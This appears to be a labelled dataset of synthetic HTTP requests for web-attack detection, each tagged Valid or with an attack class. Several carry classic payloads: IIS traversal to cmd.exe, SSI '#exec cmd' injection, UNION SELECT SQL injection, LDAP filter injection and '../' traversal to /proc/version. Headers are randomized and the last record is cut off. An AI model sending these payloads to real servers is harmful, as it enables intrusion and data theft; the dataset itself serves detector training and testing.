Via: HTTP/2.0 160.115.218.208, xld/7.4 www.dhThg.js
Transfer-Encoding: deflate
Upgrade: gefl/7.1, lhm/3.4, crto/0.1, lwu/3.1
Warning: 243 215.45.32.215 "eictewu8s0mtw5" 
X-Forwarded-For: 212.197.71.231
X-Serial-Number: 44759103360851284549
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26147
Start - Id: 25078
class: Valid
GET /inoEeeIbnCvd/lam5sb4el/dstr/asi6ahCacsmsm7pejoTh/eRaK_Gs/z09M4/ranm/ix/et/enoe.asmx?GVavcjki=r4i+q%271%28&tTahbie=817390&BGZgEI_sjvconnect=iaiwindow.openai&o7Ekllseht=39852&fAqehdodsL=76536197&alBezx=68354679 HTTP/1.1
Host: www.heReo4ixo.com
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 182.187.50.102
Cookie: iDetgcsDfawht=ttdcnceN;iivln=30e2weu8hlc;a9cp=m8t;eenjhiltrttHErc=15186
Cookie2: $Version="222"
Date: Tue, 17 Feb 04 16:35:28 GMT
ETag: "If@G4rojk@vGsF@9qb"
Expect: ealone=e4sD
From: lmqed@thztsEu.it
If-Modified-Since: Thu, 04 Mar 04 03:59:31 UTC
If-Unmodified-Since: Sun, 17 Apr 05 20:14:53 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM b3NqaXEydG9qaW13bGVlaWU2cWhpbWlyZGlMaTZ0Z2F0dw==
Authorization: Basic cnJhbjprcmZhaWU=
Range: -76678,-91938
Referer: http://nbee.be/aERt/stm1l8d/dhrse8Ae/cNniluio.nsf
TE: gzip,gzip;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.0 (X11; U; Linux i386 3.0; re-jh; rv:7.1.5) Gecko/11309322
UA-CPU: StrongARM
UA-Disp: 0466,0106,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6866x078
Via: 1.9 0.154.70.81:1433
Transfer-Encoding: compress
Upgrade: oxLt/4.8, eoiRg/1.3, tetp3B/2.6
Warning: 069 254.171.0.195 "tteepahhCi0" 
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25078
Start - Id: 44454
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 166.169.126.129:80
Connection: th8l3nbO
Accept: application/*
Accept-Charset: shift_jis, iso-8859-2, gb2312;q=0.2, windows-1258, x-mac-turkish
Accept-Encoding: *;q=0.4
Accept-Language: es-n, oco-Oonjohr
Cache-Control: max-age=9
Client-ip: 241.65.49.103
Cookie: eadimuosef=w|eidocumenthvc rac1st=$h;zewront=oihnT;1ra=likeio5Ae$lhP
Cookie2: $Version="16"
Date: Fri, 24 Mar 06 10:27:09 UTC
ETag: "Bc5LCDc_8.QFCBUmEc7y"
Expect: 100-continue
From: j7edhan@ytphgnbey0.biz
If-Modified-Since: Tue, 17 Aug 04 12:13:40 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4651
MIME-Version: 1.4
Pragma: i='iS9r'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Basic ZnRzcmFvOmVzYXhn
Range: 6-02287,72753-
Referer: /6ydh0gs0.bin
TE: gzip
Trailer: Expect
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 2.7; i7-gt; rv:7.3.4) Gecko/05529284
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: 0.9 www.tseim1a.css, 7.6 125.143.134.253, FTP/1.7 77.130.186.121
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 315 155.65.62.19 "entgnaeqidlakodma" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44454
Start - Id: 23261
class: Valid
GET /soSabinT5srmnph-D/neoeacauln/tpL85a5Bi774Wg-IU/cpjslnuo3traogaez.shtml?raeeb=n2vu&lofqLta=58104978&5xTJotaneyhMv=rH2x&attrn9NjK=l+7Pe4a%24%2FoTetomR&yd_1c2Fgktmpvar-=coeIsgtspya&nsar=jPTOMzfZhEA&OKD1UFyB=weswn&BconHiSteeo=Ieont+e&ErhnBTo=202 HTTP/1.0
Host: 79.99.243.252:84
Connection: ooaenseh
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: aneo-oottlq;q=0.1, o95ueHcu-uasda, a-odaO
Cache-Control: min-fresh=54
Client-ip: 60.210.207.54
Cookie: uTixwgetB-ls-G=aeoafTlA0niotsoi
Cookie2: $Version="8"
Date: Wed, 06 Oct 04 16:57:53 CET
ETag: "2@ut8TgWDk520dACYX5"
Expect: FtsJR=rhsWs;ullyTin
From: aFofh@flsmtees.ch
If-Modified-Since: Tue, 29 Apr 08 06:20:30 CET
If-Unmodified-Since: Fri, 14 Oct 05 02:56:41 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Dec 05 02:27:31 UTC
Max-Forwards: 34
MIME-Version: 4.6
Pragma: Llk2hofa=a
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: Digest opaque="tbtauetc"
Range: 36-367,16-
Referer: http://biase.com/io650/esey/niaoM.ace
TE: trailers,deflate;q=0.6
Trailer: User-Agent
User-Agent: rttIocecfb/1.6
UA-CPU: MIPS
UA-Disp: 7288,4441,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 386x656
Via: FTP/3.1 79.0.179.53:854, dibush/1.8 75.158.157.16
Transfer-Encoding: gzip
Upgrade: atinoz/5.3, liht/0.8, qeeon/5.8, aucer/1.3
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 85.19.231.197
X-Serial-Number: 736748310370
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23261
Start - Id: 1802
class: Valid
GET /skCiF/ThDotidotnprs/ad.bS/itaSqon2Hts/tUNPbsbz5/aBY94VOuJ7-p9U2FeBDN/1ri6GbdlcsraowmOo/uR/ghyNmaHuEa6h/gepd8ga3/eyn8xtaahdrDa/dQaQsLv76AhrRyv_JJ7.jpeg?vCdtag7ghNaeta=867 HTTP/1.0
Host: www.otwcenwwn.be:2
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 242.142.150.13
Cookie: Ciea0do=62988;ctyrgrlct=t;DdITvbscriptjyPhtaccesD0T=95;eflrioter1mh=a6Y04VHnjE6;apwde=18;rfenn92dejee=373
Cookie2: $Version="396"
Date: Mon, 02 Jun 08 07:41:07 CET
ETag: W/"tv5GcdYhIhpO_PfTD"
Expect: 100-continue
From: 7frnoich@oyp7eutp.biz
If-Modified-Since: Fri, 20 Jul 07 18:22:10 CET
If-Unmodified-Since: Fri, 19 Sep 08 09:33:28 CET
If-Match: "qyd7rTjdgh0SJR21"
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic aGVZZTpnaGZlc3By
Authorization: ilczm id6sraco=oRehotn5
Range: 9724-,33511-083617,2-
Referer: /eEviMmnr/cnaitue/wItq/t5oehee/epfndh.mp3
TE: chunked
Trailer: Via
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 6.0; s0-ny; rv:6.6.9) Gecko/56598346
UA-CPU: x86
UA-Disp: 756,3724,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 912x237
Via: h4ia/4.8 141.196.206.117:3, 8.1 www.rnndp3.tiff, FTP/4.4 234.106.247.232
Transfer-Encoding: compress
Upgrade: atHgie/2.7
Warning: 604 27.74.229.180 "uehtEmh0ejdosHSisd" "Mon, 15 Feb 10 03:04:51 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1802
Start - Id: 38071
class: LdapInjection
GET /xo6Q0iCap4/2xmlLWhttpslibJQaL/nbIJsbq92f5qK.WMKTWO/ted3eioNNdHi3nn5/oYw_m_MK/bOV8_hdQZjVN/reerbogIXiysn1/tUt4AhCItp_MPTjqp/ebeetiaUieAiau.asmx?7GCrosSn=sNweRc&ontAd=79860&eiootdet=999318&MshV6KL_logV=%3Aab&4fVDkHrSFp=4174827&xino=uD%40HG&ir=n&fipitaa=981017&aoe5ymn=%29%28++%7C++++%28tqhv%3Del*%29 HTTP/1.1
Host: www.iyia8O.ch
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.3, shift_jis;q=0.2
Accept-Encoding: gzip, identity;q=0.3, gzip
Accept-Language: *;q=0.5
Cache-Control: max-age=86661
Client-ip: 163.227.108.150
Cookie: aAlebesp=45124
Cookie2: $Version="57"
Date: Thu, 12 Oct 06 04:03:57 GMT
ETag: W/"ZLjOunFmgVCEFlo"
Expect: atelnw=rOlr2ln
From: klienot@sqnSctf.com
If-Modified-Since: Mon, 05 Jan 09 22:50:37 UTC
If-Unmodified-Since: Sun, 20 Sep 09 10:46:33 UTC
If-Match: *
If-None-Match: *
If-Range: "FmJxizBZzLrlYbp@efNj"
Max-Forwards: 3591
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic TW9nTG86YWQ2aWhp
Range: 77-,76-
Referer: /braE3spd/sE7ohm7c.gif
TE: trailers,gzip
Trailer: Accept
User-Agent: Mozilla/8.3 (Windows; U; WinNT 7.7; hs-na; rv:8.2.9) Gecko/51848771
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5823x093
Via: eesaT9/1.2 www.iu4tgi.html, 9.6 www.I2srcoiS.jpeg
Transfer-Encoding: deflate
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 530 132.99.115.0 "etnafLfea7n8Inlen7u9" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38071
Start - Id: 19425
class: Valid
GET /eewihui/bl1y4qW5tRwC7/wdropEFkD9vCvUF/b2/td5Rtdnp1etPtuEat.php4?Eon=u5ogn5fw4r77lN&IrpqDU=tbShehbuorv&r1oShjhiimspat=8511742&rd=tjpncmdosjnevej&Iea=rDDTH3&0rtua0=t&iit5cp=egyiuwnthE2nlTxb&sra=8440669&t6dbeCxsEitLen=1687831 HTTP/1.0
Host: www.tabv.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: eeT-ca, patem2-fenacie1, t-riiTyi5;q=0.2
Cache-Control: max-age=4438
Client-ip: 35.174.197.13
Cookie: rs1ubrecQscoeog=899750;eas=nusswtoRssmlasebo
Cookie2: $Version="62"
Date: Thu, 22 Feb 07 04:37:22 GMT
ETag: "guu-twVZKbaNX_k"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Fri, 04 Nov 05 24:00:03 GMT
If-Unmodified-Since: Mon, 08 Jan 07 03:12:11 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 27 Mar 07 18:01:58 CET
Max-Forwards: 8240
MIME-Version: 9.5
Pragma: nefh1nln=TtitohA2
Proxy-Authorization: NTLM ZGlhaUwyaG50aWxUczdoOWVsdGFmaGpmdGFvb2xiUzlaYWR0dE9sOXR0
Authorization: NTLM c29lbm9qb2N0b2VibTUxb3drcmVzeGR1b2g0aW42RXVhb2psaWljZGhOYXRx
Range: -2,6-20086
Referer: /MygsIeE/x6sic3I/deuta/2ocqrr/a6wk.nsf
TE: deflate,trailers,chunked
Trailer: Date
User-Agent: Mozilla/7.0 (compatible; Konqueror/6.2; Linux i386; tedcvur)
UA-CPU: x86
UA-Disp: 984,861,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6070x723
Via: 9.9 www.UAdrz.htm, 1.4 www.egpslet1.html, 7.4 www.pl3zf.htm
Transfer-Encoding: compress
Upgrade: 3tDr/0.3, octa/6.4
Warning: 817 www.dgMhdl.css "coacOilhor" 
X-Forwarded-For: 6.252.77.179
X-Serial-Number: 312709516539
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19425
Start - Id: 44027
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.0esAw.de
Connection: keep-alive
Accept: image/gif
Accept-Charset: iso-2022-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=67071
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Tue, 26 Apr 05 10:05:49 UTC
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: oOei72
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Sun, 30 Mar 08 04:11:40 UTC
If-Match: "oq7CIXRnKI_tzfx@"
If-None-Match: "7eJph@gTW85_4iJH"
If-Range: Sun, 28 Feb 10 21:17:34 GMT
Max-Forwards: 23
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: HwhbDt aamej=aueqawo
Authorization: Basic dGh0Y25hYTo4dGlvU3o=
Range: 67-764741,470518-20,3-202913
Referer: http://www.fuanrh.net/eiArrr.sh
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: aDZTzf http://www.d4Ase.net
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: gzip
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44027
Start - Id: 6912
class: Valid
PUT /skYsY.gQZuTu/D5s@weTyMcxmlWMCbody/icn4e.php4? HTTP/1.0
Content-Length: 273
Content-Language: o2
Content-Encoding: gzip
Content-Location: /s3ict.sh
Content-MD5: SG9FcXNzOE0xYmltaXRIdg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Sep 09 02:57:36 CET
Last-Modified: Mon, 10 May 04 16:23:52 CET
Host: www.paznrsa.biz:80
Connection: keep-alive
Accept: text/*, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=130
Client-ip: 192.79.6.48
Cookie: 78ZV18=e7tDriti;me=oineoehrudEii;m5toCe=iN;zeR1=rcpicecH ;be15=d Ax;PLevalw=4h
Cookie2: $Version="95"
Date: Mon, 31 Mar 08 24:47:00 GMT
ETag: "hU-V2_Sb7TH3g-yAQP"
Expect: 100-continue
From: peat@Tesgq.uk
If-Modified-Since: Sun, 03 Dec 06 11:44:17 UTC
If-Unmodified-Since: Thu, 05 Feb 04 05:50:11 GMT
If-Match: *
If-None-Match: *
If-Range: "Fo4.Al0X6EUhdlt"
Max-Forwards: 6
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic eXd0YTppaXBodDh0Zg==
Authorization: Digest cnonce="btmf5vi"
Range: 65836-,72-
Referer: http://SuefeqHz.com/unan.css
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: otir/8.3
UA-CPU: PowerPC
UA-Disp: 6111,6409,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: HTTP/0.7 176.191.196.199, 6.4 159.12.86.155, 2.9 107.237.168.226
Transfer-Encoding: identity
Upgrade: 7ro/5.4, iojug/9.0, trnw/1.9, Temt5/1.7, nncd/3.1
Warning: 638 www.shTkt.js "btitcWe0Sneyss7waf" "Sat, 20 Jan 07 15:52:13 UTC"
X-Forwarded-For: 230.81.180.144
X-Serial-Number: 65434343667649
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

arc=tbuPc5IsFV-g&ttt6wnanihsnbtY=fjz&aE=890559815&tofEt= etp:tei&dAYDW=1654858&moltelk=ueZySlrB&DcHmltaL=37793&ns8wtwlsIgnut=u9s N%v/ ?sj0sae&fisSEeilotb=uwsse7il1&OT.UZA5httpH=huawenhm2yO&5a3nas7dlh=314409950&niezinkmlaoh=72793&gDQPUmiaMwJ=nwa&nti7e2se=gCrls7adnus

End - Id: 6912
Start - Id: 40163
class: SSI
GET /seetm1tthqitfNiMosG/i53.NBVeTAzdWwI6/iaytc7aisa/9owdtAhydgtlvet6/jw@05ZMcanMSPfCpOiv4/positionZhX02QxGWDaMuX/n4p8uihritEoB9iir/luaEptkninie9segh/Ww-deleteHzN/uXCUAUnGR1-/mtraGo2hntbeSun4l5.gif?kEMw1t8@vae=%3C%21--+++++%23exec+++cmd%3D%22%2Fbin%2Fls+++++-l++++%2Fhome%2Fohit%2Fras%22+++++--%3E&xaeiMLbpuituts=sCZr_5knAnMB&aeevetnnonm7Hja=%3F%3B&rxe8naio4mea=onuf1Xo&naie=61 HTTP/1.0
Host: 115.20.251.105
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 78.111.15.54
Cookie: xEaiweccdhtl=450;w-dT=c7it;pfzi4dhdroef=aumttc2cmdewimgont;dmsywd= i1;eQietqer=L;usmyea=ssnshutdownpi0hatinrtn
Cookie2: $Version="9"
Date: Thu, 13 Aug 09 19:08:23 UTC
ETag: W/"jd5910xRTiaSO.mE"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Mon, 23 Feb 09 15:22:16 UTC
If-Unmodified-Since: Mon, 12 Jan 09 09:27:46 CET
If-Match: "1cu-DfxpvmDwuPd8fOmp"
If-None-Match: "rkFX7XuvOq5sR0vhb"
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 122
MIME-Version: 1.5
Pragma: 7nsyhnsi='ops'
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: ytbe8 eo2t=gnnhede
Range: 728-,7-688430
Referer: /oodur/otns/eouAeOp/cvnnw/wimr.txt
TE: trailers
Trailer: Warning
User-Agent: etgoahlUBti
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 786 183.48.143.31 "bRilMsnty" 
X-Forwarded-For: 165.252.155.117
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40163
Start - Id: 14835
class: Valid
GET /uKperl/2etsatekaymimov2isE/rto/pZJpTqpEmxF3K-bB/6t/ulink3id@.js? HTTP/1.1
Host: www.hdd7eh9e2.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ko4whR-evn7esi;q=0.8
Cache-Control: no-store
Client-ip: 35.5.220.119
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="33"
Date: Thu, 06 Jul 06 19:44:00 GMT
ETag: "cl9MF-53YBh2BP.F"
Expect: A7eea
From: se5tmG@5hndem.ch
If-Modified-Since: Mon, 04 Sep 06 16:43:52 GMT
If-Unmodified-Since: Thu, 28 Jun 07 18:47:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jul 08 09:30:44 CET
Max-Forwards: 896
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: niosi tjsll=y4sneodh
Authorization: Digest cnonce="eeie4hit"
Range: -67,057-805,-3
Referer: /miSONnm/erelren/ihjh0sr.sh
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.1 (compatible; MSIE 1.5; SunOS sun4u; mkuo2id; khInlth)
UA-CPU: 68000
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 923x8805
Via: 2.9 9.97.39.180, HTTP/2.2 www.xfiaenQd.htm:8
Transfer-Encoding: deflate
Upgrade: altl/2.2
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14835
Start - Id: 34336
class: Valid
PUT /eirmextzmmalta/hreoesS/yvncf6kN8f-Ez6/r_/iZGEKN0/agdhteina/eyWC5/77vs/tntmtfs/SIT/eoieDolyttnduLaeXsh/L_p.dll? HTTP/1.0
Content-Length: 64
Content-Language: iitupa,D
Content-Encoding: deflate
Content-Location: http://oetndShf.be/2flen/erbtsie3/onnSm/cipCtl.php4
Content-MD5: aWV5ZWNpdnB6c2VzdGFwaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Jul 09 08:47:56 GMT
Last-Modified: Tue, 29 May 07 04:13:45 CET
Host: www.satulLN.cz
Connection: keep-alive
Accept: image/jpeg;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e7e-hhrye1U;q=0.3, zeehpir-anmot;q=0.4, enfba3-rhon, 2-rrqshnR0
Cache-Control: no-cache
Client-ip: 108.37.62.141
Cookie: cuIelsahs=s4
Cookie2: $Version="87"
Date: Tue, 26 Dec 06 16:41:27 GMT
ETag: W/"GL@LsclmgUamZEDsv_"
Expect: 100-continue
From: 8Tmtnybi@toleu.gov
If-Modified-Since: Wed, 30 Nov 05 19:23:44 UTC
If-Unmodified-Since: Thu, 08 Jan 04 22:14:04 UTC
If-Match: "VvpHNcv8gpaTR1l@mT"
If-None-Match: "bGvMjdQJA7WH8_jir"
If-Range: Tue, 09 Feb 10 08:51:01 GMT
Max-Forwards: 4
MIME-Version: 5.0
Pragma: muna='s'
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM ZWFPMXBpZDhzZW5hbXJhY2FtZWhhcXVlb283dGFyYW9h
Range: 62994-447,-81
Referer: /a5Hs/b0hp/teiltt/7cNc/miuhrngz.msf
TE: gzip;q=0.4,trailers,chunked
Trailer: TE
User-Agent: h-9zGj1Y http://www.odoeeezE.it
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: 6.6 166.42.247.152:908, 6.9 www.ncsi6.shtml
Transfer-Encoding: gzip
Upgrade: rdr/6.4, 3nxf/4.2, 62a3t/9.7, gmOIe/2.2, sz3/4.6
Warning: 720 www.Aeesaq.jpg "emdinlt5scc" "Tue, 21 Sep 04 09:33:30 CET"
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 57690312658
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

bWantrvrcm=95863&sxo2m4Saiih4no=7525312&oosrgyddre=4&nhccm=Ctusr

End - Id: 34336
Start - Id: 41958
class: SqlInjection
GET /ihovdtoddoinigfpl/l_eI/plomuUaunailsnweg/N8e/rl3j/umusag3Aedr/edyAaalrpnaind/r8ZU/erdssodhmn6z/32N/gAoDIJkzbniI4jG7.htm?ItXenrOrslesTrE=3496&oon=f6&S0IkVK=986&ehieth=70549307&5pteiouniohaTN=EhP&eyps5U3=76&ae=b.qzH6cgKq-H&ec=dt+twinntservicesorMi%2BshR%3Ahsra&Tfnwuoit=nf3nJnt2ltts&ybupdatesock_streamxmluQHyje=8111778548&DN_ZNe5zPwjg=selectlaeld&poPoe=13318651&e4gaedh1Eoo4Esn=%27+++%29+++UNION++++ALL++++SELECT++++397+++FROM+++hbe+++WHERE+++%28+%27%27+%3D++++%27&HJAtx=349068 HTTP/1.0
Host: www.s7tf.org:461
Connection: keep-alive
Accept: audio/basic;q=0.5, text/*
Accept-Charset: euc-jp;q=0.0, windows-1252, x-mac-turkish, ks_c_5601-1987
Accept-Encoding: deflate, compress;q=0.7, identity, compress
Accept-Language: 4tdCrneC-umrtie;q=0.4, isi-xodeic;q=0.6, ld-a;q=0.5
Cache-Control: ti8xi=l
Client-ip: 87.189.251.45
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="80"
Date: Thu, 07 May 09 18:40:18 UTC
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Wed, 29 Oct 08 10:17:08 UTC
If-Unmodified-Since: Sat, 29 Aug 09 15:01:34 CET
If-Match: "K8GzieE5ucEwNxW"
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: "CvJbYmQVJKxHxyfvU"
Max-Forwards: 1217
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="eosOeu"
Range: 170-12,11579-8643,1-
Referer: http://www.nc7eyin.fr/ltmlao/n9io/ekndy/reohe5/dtej.jsp
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.0 (X11; U; Linux i586 4.0; a3-on; rv:2.0.6) Gecko/93368144
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: Goema; 1mdewo=fmrid0
Upgrade: ep1Mri/9.9, tcn/2.5, elb8/5.8, eeNie/7.6
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41958
Start - Id: 29015
class: Valid
GET /oqrorYKJ3UpPfkgP/d3V.KXENa/af-OT9qF8OBCDms_Mo/-p-FsDwindow.openiT1v/4Gadnanenrxn0tgord/melriiu.cfm?yss6LmochaZ0meta1=2ene6np8Tqe&5rfCTEjorbTR=ancons&leeeofRt4as=5086&Tdodahomowl79=642626&vhnsoDe=%2Bhtpass&heofqtldoac=eh&6pfaidoULUexecBxp_=it HTTP/1.0
Host: www.kes6t.ch
Connection: keep-alive
Accept: audio/basic, audio/x-wav, application/zip
Accept-Charset: *
Accept-Encoding: identity, gzip, identity;q=0.0, compress
Accept-Language: nreu6iel-wtnlegp
Cache-Control: no-cache
Client-ip: 59.178.244.35
Cookie: eto8ir=mga:Z
Cookie2: $Version="422"
Date: Tue, 23 Sep 08 11:14:58 GMT
ETag: W/"NvIFU.k-umRbvh9O47"
Expect: 100-continue
From: e8z2rsr@hhsecdIax.be
If-Modified-Since: Mon, 20 Nov 06 18:56:53 UTC
If-Unmodified-Since: Fri, 30 Dec 05 21:56:02 UTC
If-Match: "N8mU1pd5D-BNWsY"
If-None-Match: "xgl_5-kEmHbmx5Z"
If-Range: "DrKe0vuhfyQWQUrZBxvR"
Max-Forwards: 47
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic cndnbDdyeWU6ZWRocmVUYQ==
Authorization: Basic Y2JuaTpTczhvemE=
Range: 2318-,-7
Referer: /rtwaidcj/ctfzheb.exe
TE: trailers,chunked;q=0.2,trailers
Trailer: If-Range
User-Agent: 4cnri/6.0.4.3.6
UA-CPU: x86
UA-Disp: 023,422,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: 6.9 8.251.112.210
Transfer-Encoding: gzip
Upgrade: rpq0t/1.3, h5yess/6.6
Warning: 885 160.76.251.190 "natho4m" "Sat, 03 Apr 10 02:18:53 GMT"
X-Forwarded-For: 234.170.143.94
X-Serial-Number: 055751373307057
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29015
Start - Id: 36273
class: PathTransversal
GET /t7t18Ht0LyRretn/rPBm/ts9f7Xq@8.e_8N/dnxR.asp?htp=46805141&sBterrotadtaruw=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&elsfd=%5Dconnecto5-ng&mrherRtEItNrii=ii%5Cstyle%7C&Oneoitta4ncel=n8hkAa&Eap%uzItM8=tT8u4sLeo%40&nuindnahrno=2 HTTP/1.0
Host: 67.225.37.170
Connection: close
Accept: */*;q=0.9
Accept-Charset: macintosh;q=0.9, x-mac-hebrew, hz-gb-2312;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Cookie2: $Version="704"
Date: Wed, 16 Dec 09 03:18:12 CET
ETag: W/".jBrm6gfYyvDzZY"
Expect: 100-continue
If-Modified-Since: Tue, 09 Mar 10 06:35:55 UTC
